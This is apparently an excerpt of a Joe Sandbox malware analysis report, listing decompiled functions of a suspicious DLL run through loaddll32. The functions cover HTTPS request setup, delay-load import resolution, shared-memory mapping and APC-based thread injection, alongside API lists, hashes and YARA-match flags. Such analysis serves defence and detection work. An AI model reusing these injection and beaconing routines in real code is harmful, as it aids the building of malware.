                                  • Part of subcall function 00D45319: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,032893A0,?,00000000,30314549,00000014,004F0053,0328935C), ref: 00D45405
                                  • Part of subcall function 00D45319: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00D47CCB), ref: 00D45417
                                • GetLastError.KERNEL32 ref: 00D47DCA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                • String ID: Ut
                                • API String ID: 3521023985-8415677
                                • Opcode ID: 4abe1ce5fdf8682e596fe9dde6b9117bfe21012d8619466eeab4f01a9500ece0
                                • Instruction ID: 193f1a9a75e1284c8270a510fa0b229c8d438762af25066c3dad45bc55eaa55b
                                • Opcode Fuzzy Hash: 4abe1ce5fdf8682e596fe9dde6b9117bfe21012d8619466eeab4f01a9500ece0
                                • Instruction Fuzzy Hash: 4D514AB5905228EFCB20DF95DC849EEBFB9EF4A720F244615F815E6294D7708A44CBB0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D4A85C, Relevance: 19.6, APIs: 13, Instructions: 126networkstringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 92%
                                			E00D4A85C(void* __eax, void* __ecx, long __esi, char* _a4) {
				void _v8;
				long _v12;
				void _v16;
				void* _t34;
				void* _t38;
				void* _t40;
				char* _t56;
				long _t57;
				void* _t58;
				intOrPtr _t59;
				long _t65;

				_t65 = __esi;
				_t58 = __ecx;
				_v16 = 0xea60;
				__imp__( *(__esi + 4));
				_v12 = __eax + __eax;
				_t56 = E00D41525(__eax + __eax + 1);
				if(_t56 != 0) {
					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
						E00D48B22(_t56);
					} else {
						E00D48B22( *(__esi + 4));
						 *(__esi + 4) = _t56;
					}
				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
				 *(_t65 + 0x10) = _t34;
				if(_t34 == 0 || InternetSetStatusCallback(_t34, E00D4A7F1) == 0xffffffff) {
					L15:
					return GetLastError();
				} else {
					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x1bb, 0, 0, 3, 0, _t65); // executed
					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E00D429C0( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
						_t59 =  *0xd4d2a8; // 0x253a5a8
						_t15 = _t59 + 0xd4e743; // 0x544547
						_v8 = 0x84c03180;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84c03180, _t65); // executed
						 *(_t65 + 0x18) = _t40;
						if(_t40 == 0) {
							goto L15;
						}
						_t57 = 4;
						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
							_v8 = _v8 | 0x00000100;
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
							goto L15;
						} else {
							return 0;
						}
					} else {
						goto L15;
					}
				}
			}














                                0x00d4a85c
                                0x00d4a85c
                                0x00d4a867
                                0x00d4a86e
                                0x00d4a876
                                0x00d4a880
                                0x00d4a886
                                0x00d4a899
                                0x00d4a8a9
                                0x00d4a89b
                                0x00d4a89e
                                0x00d4a8a3
                                0x00d4a8a3
                                0x00d4a899
                                0x00d4a8b9
                                0x00d4a8bf
                                0x00d4a8c4
                                0x00d4a9b0
                                0x00000000
                                0x00d4a8df
                                0x00d4a8e2
                                0x00d4a8f8
                                0x00d4a8fe
                                0x00d4a903
                                0x00d4a92b
                                0x00d4a93e
                                0x00d4a948
                                0x00d4a94b
                                0x00d4a951
                                0x00d4a956
                                0x00000000
                                0x00000000
                                0x00d4a95a
                                0x00d4a966
                                0x00d4a977
                                0x00d4a979
                                0x00d4a98a
                                0x00d4a98a
                                0x00d4a99a
                                0x00000000
                                0x00d4a9ac
                                0x00000000
                                0x00d4a9ac
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00d4a903

                                APIs
                                • lstrlen.KERNEL32(?,00000008,74E04D40), ref: 00D4A86E
                                  • Part of subcall function 00D41525: RtlAllocateHeap.NTDLL(00000000,00000000,00D41278), ref: 00D41531
                                • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 00D4A891
                                • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 00D4A8B9
                                • InternetSetStatusCallback.WININET(00000000,00D4A7F1), ref: 00D4A8D0
                                • ResetEvent.KERNEL32(?), ref: 00D4A8E2
                                • InternetConnectA.WININET(?,?,000001BB,00000000,00000000,00000003,00000000,?), ref: 00D4A8F8
                                • GetLastError.KERNEL32 ref: 00D4A905
                                • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84C03180,?), ref: 00D4A94B
                                • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 00D4A969
                                • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 00D4A98A
                                • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 00D4A996
                                • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 00D4A9A6
                                • GetLastError.KERNEL32 ref: 00D4A9B0
                                  • Part of subcall function 00D48B22: RtlFreeHeap.NTDLL(00000000,00000000,00D4131A,00000000,?,?,00000000), ref: 00D48B2E
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                                • String ID:
                                • API String ID: 2290446683-0
                                • Opcode ID: 69c70e45fbdef4149f178bedd36c3a8d1dafc0cfcba9d0c51befd6d826a44014
                                • Instruction ID: d34fd669e0c0ef9015e014f3a0cc0138695dead2347510ce42d45a826e6880e2
                                • Opcode Fuzzy Hash: 69c70e45fbdef4149f178bedd36c3a8d1dafc0cfcba9d0c51befd6d826a44014
                                • Instruction Fuzzy Hash: 0F417E75540304BFDB319FA5DC88EABBBBDEB89700B144929F542E11A0D731A944CF31
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D4AC95, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 97 d4ac95-d4acfa 98 d4acfc-d4ad16 RaiseException 97->98 99 d4ad1b-d4ad45 97->99 100 d4aecb-d4aecf 98->100 101 d4ad47 99->101 102 d4ad4a-d4ad56 99->102 101->102 103 d4ad58-d4ad63 102->103 104 d4ad69-d4ad6b 102->104 103->104 112 d4aeae-d4aeb5 103->112 105 d4ad71-d4ad78 104->105 106 d4ae13-d4ae1d 104->106 109 d4ad88-d4ad95 LoadLibraryA 105->109 110 d4ad7a-d4ad86 105->110 107 d4ae1f-d4ae27 106->107 108 d4ae29-d4ae2b 106->108 107->108 113 d4ae2d-d4ae30 108->113 114 d4aea9-d4aeac 108->114 115 d4ad97-d4ada7 GetLastError 109->115 116 d4add8-d4ade4 InterlockedExchange 109->116 110->109 110->116 118 d4aeb7-d4aec4 112->118 119 d4aec9 112->119 121 d4ae32-d4ae35 113->121 122 d4ae5e-d4ae6c GetProcAddress 113->122 114->112 123 d4adb7-d4add3 RaiseException 115->123 124 d4ada9-d4adb5 115->124 125 d4ade6-d4adea 116->125 126 d4ae0c-d4ae0d FreeLibrary 116->126 118->119 119->100 121->122 127 d4ae37-d4ae42 121->127 122->114 128 d4ae6e-d4ae7e GetLastError 122->128 123->100 124->116 124->123 125->106 129 d4adec-d4adf8 LocalAlloc 125->129 126->106 127->122 130 d4ae44-d4ae4a 127->130 132 d4ae80-d4ae88 128->132 133 d4ae8a-d4ae8c 128->133 129->106 134 d4adfa-d4ae0a 129->134 130->122 136 d4ae4c-d4ae4f 130->136 132->133 133->114 135 d4ae8e-d4aea6 RaiseException 133->135 134->106 135->114 136->122 137 d4ae51-d4ae5c 136->137 137->114 137->122
                                C-Code - Quality: 51%
                                			E00D4AC95(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0xd40000;
				_t115 = _t139[3] + 0xd40000;
				_t131 = _t139[4] + 0xd40000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0xd40000;
				_v16 = _t139[5] + 0xd40000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0xd40002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0xd4d1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0xd4d1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0xd4d1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0xd4d19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0xd4d1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0xd4d198; // 0x0
										 *_t102 = _t125;
										 *0xd4d198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0xd4d19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}


































                                0x00d4aca4
                                0x00d4acba
                                0x00d4acc0
                                0x00d4acc2
                                0x00d4acc7
                                0x00d4accd
                                0x00d4acd2
                                0x00d4acd5
                                0x00d4ace3
                                0x00d4acea
                                0x00d4aced
                                0x00d4acf0
                                0x00d4acf1
                                0x00d4acf4
                                0x00d4acf7
                                0x00d4acfa
                                0x00d4acff
                                0x00d4ad0e
                                0x00000000
                                0x00d4ad14
                                0x00d4ad1e
                                0x00d4ad28
                                0x00d4ad2d
                                0x00d4ad2f
                                0x00d4ad39
                                0x00d4ad3c
                                0x00d4ad3f
                                0x00d4ad45
                                0x00d4ad47
                                0x00d4ad47
                                0x00d4ad4a
                                0x00d4ad4d
                                0x00d4ad52
                                0x00d4ad56
                                0x00d4ad69
                                0x00d4ad6b
                                0x00d4ae13
                                0x00d4ae13
                                0x00d4ae1a
                                0x00d4ae1d
                                0x00d4ae27
                                0x00d4ae27
                                0x00d4ae2b
                                0x00d4aea9
                                0x00d4aeac
                                0x00d4aeae
                                0x00d4aeae
                                0x00d4aeb5
                                0x00d4aeb7
                                0x00d4aec1
                                0x00d4aec4
                                0x00d4aec7
                                0x00d4aec7
                                0x00000000
                                0x00d4ae2d
                                0x00d4ae30
                                0x00d4ae5e
                                0x00d4ae68
                                0x00d4ae6c
                                0x00d4ae74
                                0x00d4ae77
                                0x00d4ae7e
                                0x00d4ae88
                                0x00d4ae88
                                0x00d4ae8c
                                0x00d4ae91
                                0x00d4aea0
                                0x00d4aea6
                                0x00d4aea6
                                0x00d4ae8c
                                0x00000000
                                0x00d4ae37
                                0x00d4ae3a
                                0x00d4ae42
                                0x00d4ae57
                                0x00d4ae5c
                                0x00000000
                                0x00000000
                                0x00d4ae5c
                                0x00000000
                                0x00d4ae42
                                0x00d4ae30
                                0x00d4ae2b
                                0x00d4ad71
                                0x00d4ad78
                                0x00d4ad88
                                0x00d4ad8b
                                0x00d4ad91
                                0x00d4ad95
                                0x00d4add8
                                0x00d4ade4
                                0x00d4ae0d
                                0x00d4ade6
                                0x00d4adea
                                0x00d4adf0
                                0x00d4adf8
                                0x00d4adfa
                                0x00d4adfd
                                0x00d4ae03
                                0x00d4ae05
                                0x00d4ae05
                                0x00d4adf8
                                0x00d4adea
                                0x00000000
                                0x00d4ade4
                                0x00d4ad9d
                                0x00d4ada0
                                0x00d4ada7
                                0x00d4adb7
                                0x00d4adba
                                0x00d4adca
                                0x00000000
                                0x00d4add0
                                0x00d4adb1
                                0x00d4adb5
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00d4adb5
                                0x00d4ad82
                                0x00d4ad86
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00d4ad86
                                0x00d4ad5f
                                0x00d4ad63
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D4AD0E
                                • LoadLibraryA.KERNEL32(?), ref: 00D4AD8B
                                • GetLastError.KERNEL32 ref: 00D4AD97
                                • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 00D4ADCA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                • String ID: $
                                • API String ID: 948315288-3993045852
                                • Opcode ID: 33ec94f2f8c62f028991db881814369e2ea2789912e94bef49eea29af5a059c5
                                • Instruction ID: b2e1ec75b42d725a5cbf82bee6c6d88233db9304317a2324f43c772652029698
                                • Opcode Fuzzy Hash: 33ec94f2f8c62f028991db881814369e2ea2789912e94bef49eea29af5a059c5
                                • Instruction Fuzzy Hash: C38118B5A40305AFDB20CFA9D884AAEB7F5EF58310F188029F955E7350EB70E905CB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D48E0D, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 74%
                                			E00D48E0D(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L00D4AF68();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0xd4d2a8; // 0x253a5a8
				_t5 = _t13 + 0xd4e87e; // 0x3288e26
				_t6 = _t13 + 0xd4e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L00D4AC0A();
				_t17 = CreateFileMappingW(0xffffffff, 0xd4d2ac, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                0x00d48e0d
                                0x00d48e15
                                0x00d48e19
                                0x00d48e1f
                                0x00d48e24
                                0x00d48e29
                                0x00d48e2c
                                0x00d48e2f
                                0x00d48e34
                                0x00d48e35
                                0x00d48e38
                                0x00d48e3d
                                0x00d48e44
                                0x00d48e4e
                                0x00d48e50
                                0x00d48e51
                                0x00d48e54
                                0x00d48e70
                                0x00d48e76
                                0x00d48e7a
                                0x00d48ec8
                                0x00d48e7c
                                0x00d48e89
                                0x00d48e99
                                0x00d48ea1
                                0x00d48eb3
                                0x00d48eb7
                                0x00000000
                                0x00000000
                                0x00d48ea3
                                0x00d48ea6
                                0x00d48eab
                                0x00d48ead
                                0x00d48ead
                                0x00d48e8b
                                0x00d48e8d
                                0x00d48eb9
                                0x00d48eba
                                0x00d48eba
                                0x00d48e89
                                0x00d48ecf

                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00D42FFF,?,?,4D283A53,?,?), ref: 00D48E19
                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00D48E2F
                                • _snwprintf.NTDLL ref: 00D48E54
                                • CreateFileMappingW.KERNELBASE(000000FF,00D4D2AC,00000004,00000000,00001000,?), ref: 00D48E70
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00D42FFF,?,?,4D283A53), ref: 00D48E82
                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 00D48E99
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00D42FFF,?,?), ref: 00D48EBA
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00D42FFF,?,?,4D283A53), ref: 00D48EC2
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                • String ID:
                                • API String ID: 1814172918-0
                                • Opcode ID: d6c514ce42e079459751dcd7ffd0f397aacd6ecebb9fc9f0851d398e696eb59f
                                • Instruction ID: f47ae9daba3539f9ab77ed5d91b9cf6ad71156da9932ca1b37e4cbf03c9162ca
                                • Opcode Fuzzy Hash: d6c514ce42e079459751dcd7ffd0f397aacd6ecebb9fc9f0851d398e696eb59f
                                • Instruction Fuzzy Hash: 4A21DFBAA41304FBC721EFA8CC05F9E77B9AB84750F240120FA05E72D0DA71D904ABB0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 1000188F, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 228 1000188f-100018a3 229 10001914-10001921 InterlockedDecrement 228->229 230 100018a5-100018a6 228->230 231 10001961-10001968 229->231 232 10001923-10001929 229->232 230->231 233 100018ac-100018b9 InterlockedIncrement 230->233 234 10001955-1000195b HeapDestroy 232->234 235 1000192b 232->235 233->231 236 100018bf-100018c5 233->236 234->231 237 10001930-10001940 SleepEx 235->237 238 100018cc-100018d3 236->238 239 10001942-10001947 237->239 240 10001949-1000194f CloseHandle 237->240 241 100018d5-10001906 call 10001c93 call 10001fb2 238->241 242 1000190f-10001912 238->242 239->237 239->240 240->234 241->231 247 10001908-1000190b 241->247 242->231 247->242
                                C-Code - Quality: 86%
                                			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x10004108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x1000410c;
						if( *0x1000410c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x10004118;
								if( *0x10004118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x1000410c);
						}
						HeapDestroy( *0x10004110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x10004108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						 *0x10004110 = _t18;
						_t41 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x10004130 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E10001FB2(E10001CE7, E10001C93(_a12, 1, 0x10004118, _t41));
							 *0x1000410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}












                                0x10001892
                                0x1000189e
                                0x100018a0
                                0x100018a3
                                0x10001919
                                0x1000191f
                                0x10001921
                                0x10001923
                                0x10001929
                                0x1000192b
                                0x10001930
                                0x10001933
                                0x1000193e
                                0x10001940
                                0x00000000
                                0x00000000
                                0x10001942
                                0x10001945
                                0x10001947
                                0x00000000
                                0x00000000
                                0x00000000
                                0x10001947
                                0x1000194f
                                0x1000194f
                                0x1000195b
                                0x1000195b
                                0x100018a5
                                0x100018a6
                                0x100018c6
                                0x100018cc
                                0x100018d1
                                0x100018d3
                                0x1000190f
                                0x1000190f
                                0x100018d5
                                0x100018dd
                                0x100018e4
                                0x100018ee
                                0x100018fa
                                0x100018ff
                                0x10001906
                                0x1000190b
                                0x00000000
                                0x1000190b
                                0x10001906
                                0x100018d3
                                0x100018a6
                                0x10001968

                                APIs
                                • InterlockedIncrement.KERNEL32(10004108), ref: 100018B1
                                • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 100018C6
                                  • Part of subcall function 10001FB2: CreateThread.KERNEL32 ref: 10001FC9
                                  • Part of subcall function 10001FB2: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 10001FDE
                                  • Part of subcall function 10001FB2: GetLastError.KERNEL32(00000000), ref: 10001FE9
                                  • Part of subcall function 10001FB2: TerminateThread.KERNEL32(00000000,00000000), ref: 10001FF3
                                  • Part of subcall function 10001FB2: CloseHandle.KERNEL32(00000000), ref: 10001FFA
                                  • Part of subcall function 10001FB2: SetLastError.KERNEL32(00000000), ref: 10002003
                                • InterlockedDecrement.KERNEL32(10004108), ref: 10001919
                                • SleepEx.KERNEL32(00000064,00000001), ref: 10001933
                                • CloseHandle.KERNEL32 ref: 1000194F
                                • HeapDestroy.KERNEL32 ref: 1000195B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                • String ID: Tt
                                • API String ID: 2110400756-3291821022
                                • Opcode ID: 231681a82db69a04dd5d25b71a6b4fa3b4976ebb6fe9f58478b6d6b933b100f7
                                • Instruction ID: 29134dd7f3199aa2df81569bc46c6dd4be899e0037607ac4421cb920fb4b24cd
                                • Opcode Fuzzy Hash: 231681a82db69a04dd5d25b71a6b4fa3b4976ebb6fe9f58478b6d6b933b100f7
                                • Instruction Fuzzy Hash: F721A5B1501225AFF701DF69CCD8ACA7BE8F7553E07128135F605E3168DB309E808B64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 10001FB2, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 32threadinjectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 248 10001fb2-10001fd3 CreateThread 249 10001fd5-10001fe6 QueueUserAPC 248->249 250 1000200a-1000200d 248->250 249->250 251 10001fe8-10002009 TerminateThread CloseHandle SetLastError 249->251 251->250
                                C-Code - Quality: 100%
                                			E10001FB2(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x10004140, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}








                                0x10001fc9
                                0x10001fcf
                                0x10001fd3
                                0x10001fde
                                0x10001fe6
                                0x10001fef
                                0x10001ff3
                                0x10001ffa
                                0x10002001
                                0x10002003
                                0x10002009
                                0x10001fe6
                                0x1000200d

                                APIs
                                • CreateThread.KERNEL32 ref: 10001FC9
                                • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 10001FDE
                                • GetLastError.KERNEL32(00000000), ref: 10001FE9
                                • TerminateThread.KERNEL32(00000000,00000000), ref: 10001FF3
                                • CloseHandle.KERNEL32(00000000), ref: 10001FFA
                                • SetLastError.KERNEL32(00000000), ref: 10002003
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                • String ID: @Mt MtTt
                                • API String ID: 3832013932-608512568
                                • Opcode ID: db2b7afd92f1f10511345ff4ebaf5267084b9dcc4c770caee6057864447a89a8
                                • Instruction ID: ce2c0407e613e175972c0e078a1766e58809613f973274f1339e8cc1b503390c
